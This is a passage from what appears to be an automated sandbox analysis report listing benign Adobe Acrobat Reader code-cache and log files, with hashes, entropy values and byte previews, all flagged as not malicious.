                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):214
                                                                                            Entropy (8bit):5.6199063609054765
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js .....|1/....."#.D...BJm.A.A..Eo......N9..............t.q..W.EZ....1...[.zC.7mD..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.535733828085143
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .,(..|1/....."#.D..JAJm.A.A..Eo........L............L...Im.@.........E.nW...IP..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.590450154760217
                                                                                            Encrypted:false
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ._...|1/....."#.DE.}BJm.A.A..Eo......)@%f...........M....m+lS..e.....<7.U.P8*.0K.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.575808897271674
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mQt6EYOFLvEWdccAHQmFmYatE1jBRCh/41:XRc9BPaK1Di/
                                                                                            MD5:9153B22AAF414309CC6CCCD3BD16DBDC
                                                                                            SHA1:9E042B744034381D212D3D329C66FFAF82C9F0A3
                                                                                            SHA-256:5548CE1DFFB23CCE3367BD9D2F40DF2D38E550A38A0B5FB7982043F4FCE40E6D
                                                                                            SHA-512:7F2E43472EA1AFD0E1D2482E88C6344EC9ED9DFAC1AFFD5E259E007573922740A1F33806D2603D4B01B5702CAB0BADF85F753394AEB487933EEC88C1BECC93A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .F\..|1/....."#.D_..CJm.A.A..Eo.......c.-........PJm...0x.x..RD...BB!@5..<..]....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):231
                                                                                            Entropy (8bit):5.564877666861383
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mqs6XYOFLvEWdFCi5mhuEtEcG9tz9kULlF4r1:bs6xRkiOt4h97LlF4
                                                                                            MD5:F922BB1D4BB8EED03540A5BD362452B1
                                                                                            SHA1:473B095400B065D1B5585FB1D7FF64D7124D775D
                                                                                            SHA-256:7A95C8E760F11BAC4212D00725865D8D9F325DA1179BD1CC56B33D184A1B91DD
                                                                                            SHA-512:7F9C2DAD8ED32B3259789CBC328426E8E7AECDFDE332463312CC606A691335984F10312B2692DECF51B77A457FE1B65759CA70A4C81B903EDE6BDEB3481C3EF2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js .~...|1/....."#.D.9.AJm.A.A..Eo...................P...#4..l....5...5..).w.. .h.~..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):215
                                                                                            Entropy (8bit):5.485212584384195
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mhYOFLvEWd/aFuBJgTlXoAkatT1EN941:WR6pXDkafEN9
                                                                                            MD5:7F465233EE2906DBB621C981B09A82E7
                                                                                            SHA1:B2704C9061A632E2B87364E850785B81E97D1FF8
                                                                                            SHA-256:AD223CA58C9368EF5AFEE1E987138E41A54B6D7AB623EE5BD1B0F299F9ECD6FE
                                                                                            SHA-512:FF2E3F3E8662753B90A54B25ADA9139EA569FF71F03AF8068EA68E0D86CAB5F253F88E2889E323700D17A6117FA9219F9116B538E578CE52609CC6CB9CF99430
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ..2..|1/....."#.D.}3CJm.A.A..Eo......../^...........a.f.m.i.o.p..3U5.....^...I.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.552134773022043
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mR9YOFLvEWd7VIGXOdQQH0kathmBMqVd3G4K41:2DRuRrUkaaB9Vd2
                                                                                            MD5:690D30C3ED98C9B35E58AC99C8D80BFA
                                                                                            SHA1:049F444F80E32D9E4EF63310FA1A3310D2F1DACC
                                                                                            SHA-256:24A1E5B72F97B2C7D83CB4ADED0E326565A40195C42C0A63DE782A8A04DCB0BC
                                                                                            SHA-512:84C7743F93E3F8FFFFE1E3668EA5565CD8222BFF033C0883A334ADA42F92F8672D557255B709B6A6957309D1C79E22B93D51A5AB7974002CE09806B7B359E895
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ..[..|1/....."#.D..'CJm.A.A..Eo.......D............y.$..$.v5j...T...z.]..._S....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):208
                                                                                            Entropy (8bit):5.596792204851484
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mkqYOFLvEWd8CAd9QTReGatDDuA424r1:+RQaEGaZyr
                                                                                            MD5:D11D6B365277C7C7C37C21BDD5D2C8F7
                                                                                            SHA1:1E15024B578A725A1CEA8A136E74E1E3AA252094
                                                                                            SHA-256:BC5E7226E46CBB976C123A90CA15CC5FB1D6FFAA22CA8C67218A29F5E1151E9D
                                                                                            SHA-512:AB6DAEA6EC2249C6CD5C54D569F7BA293B0F384D4B854776A539095D313988001DB48CDA9E21ED38D2609D6DFE4B3A3D4E30C58D3BACB4D4C07600351993455E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .....|1/....."#.D...CJm.A.A..Eo......U.K........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.48762959869972
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lS5Etla8RzYOCGLvHkWBGKuKjXKVRNUp/KPWFvOEjZpXyB9koMktXLg/1Ag2iV:moXXYOFLvEWdENUAutTDatXM/+yC8n1
                                                                                            MD5:A846A030115F30333A8D567AF6DA165D
                                                                                            SHA1:FAAED57DA7998EDDD80E6942519A5E4139832E22
                                                                                            SHA-256:F39EA3581E9C621995AA472D6E9CCCAD594317D398691FB5262CF4A2A6731541
                                                                                            SHA-512:6C0E3C1F3E10BAF739C7FE647EC04A2F2251BD024C3EAAA33D107D787AAFE426B4BDFE7EC6FD48302AA2A24C63A443C1778BD910651053C7787339822ABDC0E6
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .+!..|1/....."#.D!:+BJm.A.A..Eo......rb..........8.../...;.\\o....1..........+..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):221
                                                                                            Entropy (8bit):5.589522008873824
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lFNrs8RzYOCGLvHkWBGKuKjXKeRKVIJ/2kKLuVWpltrjMktP9/tsYWmYk5m1:mQZYOFLvEWdrROk/VQrpXltPHsLmB41
                                                                                            MD5:7515E51563D14626868C4D3DBA6C9851
                                                                                            SHA1:A229687DEA93822B8E899E30A7A8D50342DB5CAB
                                                                                            SHA-256:635398BB2A03429B9B1F562316E1E280443B52BD80FB8D2C58FD459BF73C8FA1
                                                                                            SHA-512:8EBDF83CB81793A7C56FE79A5BD31F6264271A095EDEF3AC20FBF612457EC6737DB5A81DCA98A830FF04BD0911BB2194D2BCC1438D0F1072B44CF6591D6BBCC3
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..d..|1/....."#.D...AJm.A.A..Eo......@+,......... ./.ev......N~..6.b.....$.j;:C...A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.5519216711079356
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mZ/lXYOFLvEWdccAWu/NqekGatYdm9741:qxRc9geQmdu7
                                                                                            MD5:9FB28C9369ACA7028AD8409D52652D62
                                                                                            SHA1:483E56E31B82446863C54F65DBCF07927418AD3F
                                                                                            SHA-256:13EB7910085354DF5B64CE5F5C7651BEBD6E26D37D54A28D40DB5714B7AF357F
                                                                                            SHA-512:4F2FAB4B8939A6B3BF3B42C2F605FE86BFC3ADF8A72583F5799E0779CC965574B4EBC9F6D42DB7BB87DCFBE7D4C31E86A0904350A2035D86A5C6065556169075
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js .0%..|1/....."#.D.>.BJm.A.A..Eo.....................U...I.>P...X...x..0U.~;m.x.k.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204
                                                                                            Entropy (8bit):5.556246948764075
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvTe0x1s59koMkt4tEB6shoq+Nem1:mMOYOFLvEWdwAPVu5d1fatoEB6Jn1
                                                                                            MD5:3C1FB5302CFC6C51BFC3B7FAB6629A83
                                                                                            SHA1:2C902403F860C21CE4EFDCE27567C62320D29520
                                                                                            SHA-256:B9616FEDA6105ED3EBDB6C3FDC5BAEB7EC4B64624706E00D19BF6FC7AE9F51B5
                                                                                            SHA-512:295C861D08AD27AC1038417C56A801A8DEDAD13304F50CBA9B71E47486F91C2AC8D5E01748024873442253ED7AE78B84D2F67F00C475C71EA6472B242911F085
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js .....|1/....."#.Da.+BJm.A.A..Eo......z...............k....F..D..O.n;[.1m.....=..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):212
                                                                                            Entropy (8bit):5.650379076978515
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:m3PXYOFLvEWdBJvYQIReekat+XAhcsBXIh1:mxRBJQ67am4B
                                                                                            MD5:62D2F77749607E92907F28E408859CBA
                                                                                            SHA1:55F2E6797920494939431B51D5775F200887563F
                                                                                            SHA-256:695934408AB3D501A835C72D6EB40AEC6ED77892197D4780800EC5A85597823F
                                                                                            SHA-512:F5DC5CB0CE1536836F3B7413618BD18BB79BA9CD806159AC4A3C1385DA67C0E4F2DA4DCFC130AED004B7713915AE7AE8D75AF914C86F1AC4ED666D33A20F3CCA
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js .2z..|1/....."#.Da.>CJm.A.A..Eo......LFI............k..`..N3.... ..d..$[.....{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):228
                                                                                            Entropy (8bit):5.574997375669393
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:msPYOFLvEWdrROk/RJUQn+XOQatTtlZc3Me/1:3RrROk/s9OP5tz
                                                                                            MD5:B8FE236AC1B8BA5A045EB667D1A72F71
                                                                                            SHA1:5D61A8977831C9D6D37BF764C5EEA955CC1433FD
                                                                                            SHA-256:877EFF0B53413EB3428CB593B78C176E8B040C8E3A010E04F918B36F6BDDB572
                                                                                            SHA-512:D7216F5012E542C7FA121934C4B5A0BBA809633D080124A3C8AAE3CC37EF696CD62D5F2250F0B793D5CAA4708581553334758288F61C18222A7BD3EC34DD14D9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..e..|1/....."#.Dq..BJm.A.A..Eo......"V%..............9Q].8O.z....=..:.N.{....N{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1080
                                                                                            Entropy (8bit):5.318786048155944
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:3/4+/l/Cb5tkpLuj4M8U9ZTMzjNJUZMi+/l/A02t0WmZAEmLoXCCkGn:3GluUj4M88MS50QEmY3f
                                                                                            MD5:92ED93F401C51D9BC88585BA21F5994C
                                                                                            SHA1:ED06B287020A19A0CCCD0144386FEA0F2B7B9ECA
                                                                                            SHA-256:CF39E93E8AD12C210F63BE63ED922BE68DD7543E24434EFF6B9A52DC77EE2DA4
                                                                                            SHA-512:636B789644A1EE27A810332C8F1F84F6A300860C49F503E027380EC7919578585357615E5539ADDC457F7C36B1CF2CB85662075407A8F1AC81E2D8CA0A36D345
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1080
                                                                                            Entropy (8bit):5.318786048155944
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:3/4+/l/Cb5tkpLuj4M8U9ZTMzjNJUZMi+/l/A02t0WmZAEmLoXCCkGn:3GluUj4M88MS50QEmY3f
                                                                                            MD5:92ED93F401C51D9BC88585BA21F5994C
                                                                                            SHA1:ED06B287020A19A0CCCD0144386FEA0F2B7B9ECA
                                                                                            SHA-256:CF39E93E8AD12C210F63BE63ED922BE68DD7543E24434EFF6B9A52DC77EE2DA4
                                                                                            SHA-512:636B789644A1EE27A810332C8F1F84F6A300860C49F503E027380EC7919578585357615E5539ADDC457F7C36B1CF2CB85662075407A8F1AC81E2D8CA0A36D345
                                                                                            Malicious:false
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_05349744be1ad4ad_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):205
                                                                                            Entropy (8bit):5.643412364247602
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVL172EvB9koMkt6/t/iTFJrqzOJkvP5y:men9YOFLvEWdM9Q21n9katii7Z+P41
                                                                                            MD5:16C8ACA88FB8879A1D8032F86C5897BD
                                                                                            SHA1:4C4D8E8E1D615D5B1FA3E59BD608AA94818EAA2D
                                                                                            SHA-256:A2D712DB6523CC35C883746D57A1D7AADC6A873091A57B48784908B87AD463EF
                                                                                            SHA-512:7CB9B9C914FAC252074D7F7B55BAB552028887F5BAAE01D0FEDBEAE578E21D7B475F34D58F526AB367E83F8804A559BC0AE87F0FC29F1FC288BCCA17E339CAF4
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .'~..|1/....."#.D.SXCJm.A.A..Eo........c.............d.{v.^.G...d.W.:...P..k%..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_0998db3a32ab3f41_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):5.574227650269549
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuLe/fQfatdt/RlUoSjGY1:DyeRVFAFjVFAFX+f33tZlUo6
                                                                                            MD5:3F6543D02E6C6D1B81B7502B5F8F9C12
                                                                                            SHA1:BB0E857F6CAA6BA89574922DEA2D918FB4F9A829
                                                                                            SHA-256:AFB5D87367F69905C04E2EB67F2C7C2C8978E3E6C9BDCA4FF718F3310AE3FA9E
                                                                                            SHA-512:A0E9C5A8939EE738F5F8128FA4882884671D1652461736103AAB2047413F622C6C40D8FAE7C895DAE78254460E9A35C4C1BD5C5CC7329541A8BB782F0B41852E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .....|1/....."#.DK..BJm.A.A..Eo......q`............hvDO.N.t@.....n.*...... ....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_4a0e94571d979b3c_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177
                                                                                            Entropy (8bit):5.504847142449123
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvSEltTwvAqMkt3tkd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvzsoQt3GjUdyP41
                                                                                            MD5:46A69AEF0DD9C3E7DA0B3135C3B6F6DE
                                                                                            SHA1:91F9701BC26CCF77BC7B8AC7FAD5DB5078CBBE91
                                                                                            SHA-256:74B975993584F52DD484B565E1B10FE277DD24501D489AD963757EBF8ADB2E36
                                                                                            SHA-512:89ED3ED32EB73EFC9AE0DF8BCEFC94055540FAD77FAB4D8235A7CF2E22ED9B935FD3A8A0E40ACFBF2BA89A7371BBF3284D48C57626E01BC731C4E5A700EDB887
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..$..|1/....."#.D..3AJm.A.A..Eo.......,...........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_927a1596c37ebe5e_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.538713843032575
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFveathfAdoMktZqFoDb7T2/1:mYilPYOFLvEWd8CAdAu0ehfQat6ong1
                                                                                            MD5:19163C5DBFA4657ECC755242436D5957
                                                                                            SHA1:46D116BF03480508F3281F6B7335E511C350960A
                                                                                            SHA-256:10F3B78B36AAF14B92FB5BFE2524497E5E9F5FE50EC63D4FA1584C552CBE81B7
                                                                                            SHA-512:75CB30388883FBFF2DB397582D733F97AAFF16E19C6636C1FD42BF5F5B18133D983BD67F47488CBCDBF7BCE813326AC47BE6C928007D61B7AF4D0843FFC186A2
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js .....|1/....."#.DFy.BJm.A.A..Eo................c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_aba6710fde0876af_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188
                                                                                            Entropy (8bit):5.572329118833723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7Cv2xlXVk9hMkttLllEBiaQ562HvpMm1:mAElVYOFLvEW1Kpx1O9jttRrx56uvp1
                                                                                            MD5:59BB6F7C29C91DE7B246D01E6A0EED9A
                                                                                            SHA1:8753417C85513B236977CE8BAE0918480B8E5C45
                                                                                            SHA-256:C1AF21948A4877FC6C02B822B5A1B094C2411E41DF24CDBB20286170C8584C57
                                                                                            SHA-512:1DA8A76E2B6A4EC1FB4F31C3359639F8DBB05789CD79F3FC5E5B95C27F62F1072B35296863FF64E79DE66C0DE3E41BC05E2FEEE9F2C95A02BEB25C8798B26672
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js .M...|1/....."#.D..tAJm.A.A..Eo.......~..........z?...SwC...^..y.....V..7R-O.....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_bba29d2e6197e2f4_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):211
                                                                                            Entropy (8bit):5.535733828085143
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvk0qat3+9Mkt0AlnpSKGoS6:msRPYOFLvEWIa7zp7q3itrt8VPu1
                                                                                            MD5:D34964488831106CFC2136E21538F473
                                                                                            SHA1:F918DFAD52091DA9A2E383A6C74BF033E625FEE7
                                                                                            SHA-256:7EDB43D1869951E9FCB6A96A5E8E8BFA3622825021CF2D2B5456508E9DEE9A75
                                                                                            SHA-512:72E4F9A8385F7FCB86DA5B72133BF0D216BFF483A95AE254329F3707118D70C360A016350F8795A57F336D283BCB1813CBBD1FD0A77D8899EC6178FD0D437446
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .,(..|1/....."#.D..JAJm.A.A..Eo........L............L...Im.@.........E.nW...IP..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\todelete_febb41df4ea2b63a_0_1 (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):228
                                                                                            Entropy (8bit):5.574997375669393
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:msPYOFLvEWdrROk/RJUQn+XOQatTtlZc3Me/1:3RrROk/s9OP5tz
                                                                                            MD5:B8FE236AC1B8BA5A045EB667D1A72F71
                                                                                            SHA1:5D61A8977831C9D6D37BF764C5EEA955CC1433FD
                                                                                            SHA-256:877EFF0B53413EB3428CB593B78C176E8B040C8E3A010E04F918B36F6BDDB572
                                                                                            SHA-512:D7216F5012E542C7FA121934C4B5A0BBA809633D080124A3C8AAE3CC37EF696CD62D5F2250F0B793D5CAA4708581553334758288F61C18222A7BD3EC34DD14D9
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..e..|1/....."#.Dq..BJm.A.A..Eo......"V%..............9Q].8O.z....=..:.N.{....N{.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.196645046328699
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mUptnat+q2PWXp+N2nKuAl9OmbnIFUtHptaZZmwtptJVkwOWXp+N2nKuAl9Ombjd:lpMovaHAahFUtHp8/tpJ5fHAaSJ
                                                                                            MD5:16083A30070FFB22A92F8DD71D08FF45
                                                                                            SHA1:1D8CEA21AC8B8C3C08BD0EB3AC9B30F0F8EDE4DB
                                                                                            SHA-256:22785BE4C986D233CE83C1EB86FE8885CED1D80EF22904E205B0A83FEA341B6F
                                                                                            SHA-512:05AD5EB7A34414503CAE547813BFF50CA792C1895D444402CA63631F41D23AADB9695FA6352B96209969FD88A52EFC6DFF71C21A077140C37142DAC38CCFFCEE
                                                                                            Malicious:false
                                                                                            Preview: 2021/12/11-14:40:58.579 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/12/11-14:40:58.580 1c18 Recovering log #3.2021/12/11-14:40:58.581 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.196645046328699
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mUptnat+q2PWXp+N2nKuAl9OmbnIFUtHptaZZmwtptJVkwOWXp+N2nKuAl9Ombjd:lpMovaHAahFUtHp8/tpJ5fHAaSJ
                                                                                            MD5:16083A30070FFB22A92F8DD71D08FF45
                                                                                            SHA1:1D8CEA21AC8B8C3C08BD0EB3AC9B30F0F8EDE4DB
                                                                                            SHA-256:22785BE4C986D233CE83C1EB86FE8885CED1D80EF22904E205B0A83FEA341B6F
